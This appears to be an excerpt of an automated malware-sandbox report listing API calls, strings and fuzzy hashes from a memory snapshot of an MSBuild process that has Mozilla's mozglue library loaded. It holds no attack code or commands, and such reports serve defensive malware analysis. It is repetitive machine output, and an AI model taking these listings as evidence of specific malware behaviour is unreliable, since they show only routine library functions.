                                                                                                                                                                                                                      • 0pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO9ADTntR27UucmkNAwBpKXHPNGKBif54pKXH/6qO1ACUlKeOtFAxPajPBo7UUAJ15oIpcD3o6etACH86OKD1o/KgYlJml7Uf54oGHpSY9qX6UZoAbmjFL2pKADv6UgFKPrRi, xrefs: 6C8E619D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc$freememcpy
                                                                                                                                                                                                                      • String ID: 0pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO9ADTntR27UucmkNAwBpKXHPNGKBif54pKXH/6qO1ACUlKeOtFAxPajPBo7UUAJ15oIpcD3o6etACH86OKD1o/KgYlJml7Uf54oGHpSY9qX6UZoAbmjFL2pKADv6UgFKPrRi
                                                                                                                                                                                                                      • API String ID: 4259248891-450914710
                                                                                                                                                                                                                      • Opcode ID: 376dd6a70be2f3a422908fcf7d22f987fdea85df7be5b80e695af35d6ff4bc01
                                                                                                                                                                                                                      • Instruction ID: 2409b8fb97a5a5262a8f4b3a435fb46846519d354c14175fc7c01af06209ac6c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 376dd6a70be2f3a422908fcf7d22f987fdea85df7be5b80e695af35d6ff4bc01
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55310871A0460E8FDB14CF2CD9806AA73E9FF5A308F10893DC55AD7651EB31E558C751
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F770), ref: 6C8EA858
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8EA87B
                                                                                                                                                                                                                        • Part of subcall function 6C8EA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C8EA88F,00000000), ref: 6C8EA9F1
                                                                                                                                                                                                                      • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C8EA8FF
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8EA90C
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F770), ref: 6C8EA97E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1355178011-0
                                                                                                                                                                                                                      • Opcode ID: 80d12d975b7eac08b700fd2ae6e674a3acf956a47506baa746cb963334e5053c
                                                                                                                                                                                                                      • Instruction ID: 749305edb93df12afd4fe8981a38eee7b9abd59da63feff125dd81b6cad34834
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80d12d975b7eac08b700fd2ae6e674a3acf956a47506baa746cb963334e5053c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA41B5B1E002048FDB10DFA8C845BDEBB71FF09724F108A29E825AB781D771E945CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(-00000002,?,6C89152B,?,?,?,?,6C891248,?), ref: 6C89159C
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C89152B,?,?,?,?,6C891248,?), ref: 6C8915BC
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(-00000001,?,6C89152B,?,?,?,?,6C891248,?), ref: 6C8915E7
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,6C89152B,?,?,?,?,6C891248,?), ref: 6C891606
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C89152B,?,?,?,?,6C891248,?), ref: 6C891637
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 733145618-0
                                                                                                                                                                                                                      • Opcode ID: d26ee7c3bda6ea49e2e057a32027e1ed7e79044bb3c1cddbfdb681a2ff705cca
                                                                                                                                                                                                                      • Instruction ID: c36fb88f4829606ea8c4587c97d059722ac49a774b46232594920cb0311e72f9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d26ee7c3bda6ea49e2e057a32027e1ed7e79044bb3c1cddbfdb681a2ff705cca
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6131D672A085148BC7289E7CDA9046E77ADAB813647250F3DE423DBBD4EB30D9158791
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C8FE330,?,6C8AC059), ref: 6C8EAD9D
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C8FE330,?,6C8AC059), ref: 6C8EADAC
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,00000000,?,?,6C8FE330,?,6C8AC059), ref: 6C8EAE01
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,6C8FE330,?,6C8AC059), ref: 6C8EAE1D
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C8FE330,?,6C8AC059), ref: 6C8EAE3D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3161513745-0
                                                                                                                                                                                                                      • Opcode ID: 15e6c8ec59c5b0a86dd04f8e5a1a2aa42442ed8c0c834ab5cad5705c43241870
                                                                                                                                                                                                                      • Instruction ID: bb164e653f63855c36c578e1606e089ecfe801cc8e0f5a86d7fda925b5e09996
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15e6c8ec59c5b0a86dd04f8e5a1a2aa42442ed8c0c834ab5cad5705c43241870
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C315EB1A002159FDB20DF798D44AABBBF8EF49654F15883DE85AD7700E734E804CBA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C8FDCA0,?,?,?,6C8BE8B5,00000000), ref: 6C8E5F1F
                                                                                                                                                                                                                      • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C8BE8B5,00000000), ref: 6C8E5F4B
                                                                                                                                                                                                                      • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C8BE8B5,00000000), ref: 6C8E5F7B
                                                                                                                                                                                                                      • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C8BE8B5,00000000), ref: 6C8E5F9F
                                                                                                                                                                                                                      • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C8BE8B5,00000000), ref: 6C8E5FD6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1389714915-0
                                                                                                                                                                                                                      • Opcode ID: 434876e4de6aeb3c633cf648c70f7588b460820d7a9c82f25409121bb3211772
                                                                                                                                                                                                                      • Instruction ID: 468024f3175cf9300accbdbfa1632b436b665220d46513796bc5a4737f0d87f1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 434876e4de6aeb3c633cf648c70f7588b460820d7a9c82f25409121bb3211772
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C31FA343046008FD724CF29C998E2AB7F9FF8A319B644958F5568BB95CB31EC41CB80
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 6C88B532
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C88B55B
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C88B56B
                                                                                                                                                                                                                      • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C88B57E
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C88B58F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4244350000-0
                                                                                                                                                                                                                      • Opcode ID: 56f9414c86b1f2791069029931049de425e1711084422c78bc4abe8e04dd9abe
                                                                                                                                                                                                                      • Instruction ID: 2d01a4d0f36064498469ee113af75552fcbce37a9f9ecfd1665069b288d118ed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56f9414c86b1f2791069029931049de425e1711084422c78bc4abe8e04dd9abe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5821F671A012059BDB108FA8CD40BBABBB9FF86314F28446DE818DB781E776D911C7A1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C88B7CF
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C88B808
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C88B82C
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C88B840
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C88B849
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1977084945-0
                                                                                                                                                                                                                      • Opcode ID: df26535c82ae88f67fed615470afd8bf9c80089987047783f379933336dfdf53
                                                                                                                                                                                                                      • Instruction ID: 2ee53ca004032d949ed23951dbac59a4a9589430ce2833ff72055ba091c0dbb0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df26535c82ae88f67fed615470afd8bf9c80089987047783f379933336dfdf53
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0218BB0E002199FDF10DFA9C9845FEBBB4EF49354F148529EC15A7741E731A944CBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C8E6E78
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: InitializeCriticalSection.KERNEL32(6C90F618), ref: 6C8E6A68
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: GetCurrentProcess.KERNEL32 ref: 6C8E6A7D
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: GetCurrentProcess.KERNEL32 ref: 6C8E6AA1
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: EnterCriticalSection.KERNEL32(6C90F618), ref: 6C8E6AAE
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C8E6AE1
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C8E6B15
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C8E6B65
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: LeaveCriticalSection.KERNEL32(6C90F618,?,?), ref: 6C8E6B83
                                                                                                                                                                                                                      • MozFormatCodeAddress.MOZGLUE ref: 6C8E6EC1
                                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C8E6EE1
                                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C8E6EED
                                                                                                                                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C8E6EFF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4058739482-0
                                                                                                                                                                                                                      • Opcode ID: 17c9437fd180d29e486689e9930937240e3b5b0228c336947d50a5b942b56262
                                                                                                                                                                                                                      • Instruction ID: 1acb0d86a58d72f1f5b7e32a6198284eb24706e0c97845387ae6c00a67af85f9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17c9437fd180d29e486689e9930937240e3b5b0228c336947d50a5b942b56262
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6721C1B1A0821E8FDB10CF69D98469E77F4EF89308F04443DE90997341EB709A588F92
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32 ref: 6C8E76F2
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000001), ref: 6C8E7705
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C8E7717
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C8E778F,00000000,00000000,00000000,00000000), ref: 6C8E7731
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8E7760
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C883DEF), ref: 6C8C0D71
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C883DEF), ref: 6C8C0D84
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C883DEF), ref: 6C8C0DAF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Virtual$Free$Alloc
                                                                                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(000000FF), ref: 6C8E586C
                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 6C8E5878
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C8E5898
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C8E58C9
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8E58D3
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$CloseHandleObjectSingleWait
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C8D75C4,?), ref: 6C8D762B
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C8D74D7,6C8E15FC,?,?,?), ref: 6C8D7644
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D765A
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C8D74D7,6C8E15FC,?,?,?), ref: 6C8D7663
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C8D74D7,6C8E15FC,?,?,?), ref: 6C8D7677
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8E1800
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                        • Part of subcall function 6C884290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C8C3EBD,6C8C3EBD,00000000), ref: 6C8842A9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                                                                                                                                                      • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C8EB0A6,6C8EB0A6,?,6C8EAF67,?,00000010,?,6C8EAF67,?,00000010,00000000,?,?,6C8EAB1F), ref: 6C8EB1F2
                                                                                                                                                                                                                      • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C8EB0A6,6C8EB0A6,?,6C8EAF67,?,00000010,?,6C8EAF67,?,00000010,00000000,?), ref: 6C8EB1FF
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C8EB0A6,6C8EB0A6,?,6C8EAF67,?,00000010,?,6C8EAF67,?,00000010), ref: 6C8EB25F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$Xlength_error@std@@
                                                                                                                                                                                                                      • String ID: map/set<T> too long
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD4F2
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD50B
                                                                                                                                                                                                                        • Part of subcall function 6C88CFE0: EnterCriticalSection.KERNEL32(6C90E784), ref: 6C88CFF6
                                                                                                                                                                                                                        • Part of subcall function 6C88CFE0: LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C88D026
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD52E
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7DC), ref: 6C8AD690
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD751
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                                                      • String ID: MOZ_CRASH()
                                                                                                                                                                                                                      • API String ID: 3805649505-2608361144
                                                                                                                                                                                                                      • Opcode ID: 275b257e5df415377845c47f438f0c61b7c00e30b54477ff5757a355d83a5e86
                                                                                                                                                                                                                      • Instruction ID: d7dab8f8f797ed76fe0698529932b0a81283d208926d5bf202b834e8bf9b199f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 275b257e5df415377845c47f438f0c61b7c00e30b54477ff5757a355d83a5e86
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C51BF71B087058FD368CF68C29465AB7E1EB89704F244E2ED9AAC7B85D770E805CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
